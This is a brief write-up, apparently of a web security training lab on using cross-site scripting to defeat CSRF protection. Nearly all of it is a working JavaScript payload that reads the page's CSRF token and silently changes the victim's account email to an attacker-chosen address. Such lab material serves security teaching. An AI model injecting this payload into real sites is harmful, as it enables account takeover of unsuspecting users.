Exploiting XSS to bypass CSRF defenses | Practitioner
In the spirit of this problem, we can simply set up a similar payload as shown here:
<script>
setTimeout(function(){
var token = document.getElementsByName('csrf')[0].value;
var data = new FormData();
data.append('csrf', token);
data.append('email', 'hijacked@test.com');
fetch('/my-account/change-email', {
method: 'POST',
body: data
});
}, 100);
</script>